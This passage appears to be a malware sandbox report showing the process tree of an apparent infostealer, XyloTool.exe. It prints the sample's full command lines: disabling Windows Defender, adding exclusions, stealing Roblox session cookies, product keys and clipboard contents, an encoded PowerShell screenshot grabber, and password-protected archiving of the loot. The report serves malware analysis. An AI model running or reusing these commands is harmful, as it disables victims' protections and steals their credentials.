C:\Windows\system32\tree.comtree /A /F4⤵PID:7192
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵PID:1808
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4560 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:7212
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:3260 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"3⤵PID:2380
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiA
G8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
  Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
  PID: 4924
- [depth 5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\35lrmyfg\35lrmyfg.cmdline"
  PID: 8540
- [depth 6] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
  Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4A6E.tmp" "c:\Users\Admin\AppData\Local\Temp\35lrmyfg\CSCC988D1B75F8349DF868935A8C4D69627.TMP"
  PID: 8624
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 8240
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 8376
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 8400
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 8472
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 8488
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 8568
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 8580
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 8668
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 8688
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 8768
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
  PID: 8948
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  Signatures: Suspicious behavior: EnumeratesProcesses
  PID: 9004
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
  PID: 9124
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  Signatures: Suspicious behavior: EnumeratesProcesses
  PID: 9184
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "getmac"
  PID: 8184
- [depth 4] C:\Windows\system32\getmac.exe
  Command line: getmac
  PID: 8332
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48362\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\bp001.zip" *"
  PID: 8372
- [depth 4] C:\Users\Admin\AppData\Local\Temp\_MEI48362\rar.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\_MEI48362\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\bp001.zip" *
  Signatures: Executes dropped EXE
  PID: 8420
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
  PID: 2576
- [depth 4] C:\Windows\System32\Wbem\WMIC.exe
  Command line: wmic os get Caption
  PID: 7948
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
  PID: 5132
- [depth 4] C:\Windows\System32\Wbem\WMIC.exe
  Command line: wmic computersystem get totalphysicalmemory
  PID: 6048
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
  PID: 8452
- [depth 4] C:\Windows\System32\Wbem\WMIC.exe
  Command line: wmic csproduct get uuid
  PID: 8532
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
  PID: 8568
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  Signatures: Suspicious behavior: EnumeratesProcesses
  PID: 8632
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
  PID: 7464
- [depth 4] C:\Windows\System32\Wbem\WMIC.exe
  Command line: wmic path win32_VideoController get name
  Signatures: Detects videocard installed
  PID: 3392
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
  PID: 1628
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
  Signatures: Suspicious behavior: EnumeratesProcesses
  PID: 1524
- [depth 1] C:\Users\Admin\Desktop\XyloTool.exe
  Command line: "C:\Users\Admin\Desktop\XyloTool.exe"
  Signatures: Executes dropped EXE
  PID: 7888
- [depth 2] C:\Users\Admin\Desktop\XyloTool.exe
  Command line: "C:\Users\Admin\Desktop\XyloTool.exe"
  Signatures: Executes dropped EXE; Loads dropped DLL
  PID: 3152
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'"
  PID: 5488
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'
  Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
  PID: 7024
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
  PID: 3052
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  Signatures: Suspicious behavior: EnumeratesProcesses
  PID: 8924
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
  PID: 1940
- [depth 4] C:\Windows\system32\tasklist.exe
  Command line: tasklist /FO LIST
  Signatures: Enumerates processes with tasklist
  PID: 9016
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
  PID: 8840
- [depth 4] C:\Windows\system32\tasklist.exe
  Command line: tasklist /FO LIST
  Signatures: Enumerates processes with tasklist
  PID: 9076
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
  PID: 9008
- [depth 4] C:\Windows\System32\Wbem\WMIC.exe
  Command line: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
  PID: 7980
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
  PID: 9208
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell Get-Clipboard
  Signatures: Suspicious behavior: EnumeratesProcesses
  PID: 8272
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
  PID: 3372
- [depth 4] C:\Windows\system32\tasklist.exe
  Command line: tasklist /FO LIST
  Signatures: Enumerates processes with tasklist
  PID: 8352
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 9184
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 4560
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
  PID: 9132
- [depth 4] C:\Windows\system32\netsh.exe
  Command line: netsh wlan show profile
  Signatures: Event Triggered Execution: Netsh Helper DLL
  PID: 2348
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "systeminfo"
  PID: 4940
- [depth 4] C:\Windows\system32\systeminfo.exe
  Command line: systeminfo
  Signatures: Gathers system information
  PID: 5132
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
  PID: 7292
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
  Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
  PID: 7648
- [depth 5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c2fwqu54\c2fwqu54.cmdline"
  PID: 1184
- [depth 6] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
  Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8EBB.tmp" "c:\Users\Admin\AppData\Local\Temp\c2fwqu54\CSCF122D94BDFBC4FEFB711E6E59DA1EBB.TMP"
  PID: 3276
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 7460
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 8732
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 8456
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 8208
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 8760
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 1072
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 2312
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 8796
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 6300
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 6292
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
  PID: 7272
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  Signatures: Suspicious behavior: EnumeratesProcesses
  PID: 8216
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "getmac"
  PID: 2576
- [depth 4] C:\Windows\system32\getmac.exe
  Command line: getmac
  PID: 8016
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
  PID: 8316
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  Signatures: Suspicious behavior: EnumeratesProcesses
  PID: 3124
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI78882\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\IFuAT.zip" *"
  PID: 9004
- [depth 4] C:\Users\Admin\AppData\Local\Temp\_MEI78882\rar.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\_MEI78882\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\IFuAT.zip" *
  Signatures: Executes dropped EXE
  PID: 7688
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
  PID: 8324
- [depth 4] C:\Windows\System32\Wbem\WMIC.exe
  Command line: wmic os get Caption
  PID: 8344
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
  PID: 752
- [depth 4] C:\Windows\System32\Wbem\WMIC.exe
  Command line: wmic computersystem get totalphysicalmemory
  PID: 8788
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
  PID: 6300
- [depth 4] C:\Windows\System32\Wbem\WMIC.exe
  Command line: wmic csproduct get uuid
  PID: 1108
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
  PID: 2000
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  PID: 6500
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
  PID: 8520
- [depth 4] C:\Windows\System32\Wbem\WMIC.exe
  Command line: wmic path win32_VideoController get name
  Signatures: Detects videocard installed
  PID: 4784
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
  PID: 7368
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
  PID: 9116
- [depth 1] C:\Windows\system32\taskmgr.exe
  Command line: "C:\Windows\system32\taskmgr.exe" /7
  Signatures: Checks SCSI registry key(s); Checks processor information in registry; Modifies registry class; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
  PID: 8212
- [depth 1] C:\Users\Admin\Desktop\XyloTool.exe
  Command line: "C:\Users\Admin\Desktop\XyloTool.exe"
  Signatures: Executes dropped EXE
  PID: 8912
- [depth 2] C:\Users\Admin\Desktop\XyloTool.exe
  Command line: "C:\Users\Admin\Desktop\XyloTool.exe"
  Signatures: Executes dropped EXE; Loads dropped DLL
  PID: 9056
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'"
  PID: 8548
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'
  Signatures: Command and Scripting Interpreter: PowerShell
  PID: 3512
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
  PID: 8520
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  PID: 9100
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
  PID: 8748
- [depth 4] C:\Windows\system32\tasklist.exe
  Command line: tasklist /FO LIST
  Signatures: Enumerates processes with tasklist
  PID: 3244
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
  PID: 8544
- [depth 4] C:\Windows\system32\tasklist.exe
  Command line: tasklist /FO LIST
  Signatures: Enumerates processes with tasklist
  PID: 7304
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
  PID: 8336
- [depth 4] C:\Windows\System32\Wbem\WMIC.exe
  Command line: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
  PID: 5648
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
  PID: 4028
- [depth 4] C:\Windows\system32\tasklist.exe
  Command line: tasklist /FO LIST
  Signatures: Enumerates processes with tasklist
  PID: 2172
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
  PID: 460
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell Get-Clipboard
  PID: 8932
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 7652
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 4688
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
  PID: 2404
- [depth 4] C:\Windows\system32\netsh.exe
  Command line: netsh wlan show profile
  Signatures: Event Triggered Execution: Netsh Helper DLL
  PID: 5816
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "systeminfo"
  PID: 8368
- [depth 4] C:\Windows\system32\systeminfo.exe
  Command line: systeminfo
  Signatures: Gathers system information
  PID: 1780
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
  PID: 7888
- [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
  Signatures: Command and Scripting Interpreter: PowerShell
  PID: 6728
- [depth 5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ccqxalhk\ccqxalhk.cmdline"
  PID: 3152
- [depth 6] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
  Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2482.tmp" "c:\Users\Admin\AppData\Local\Temp\ccqxalhk\CSCC41004D0810A437BB340FEF23CC46783.TMP"
  PID: 8180
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 3552
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 7408
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 4436
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 8552
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 8072
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 4916
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 7428
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 996
- [depth 3] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
  PID: 464
- [depth 4] C:\Windows\system32\tree.com
  Command line: tree /A /F
  PID: 7260
- [depth 3] C:\Windows\system32\cmd.exe
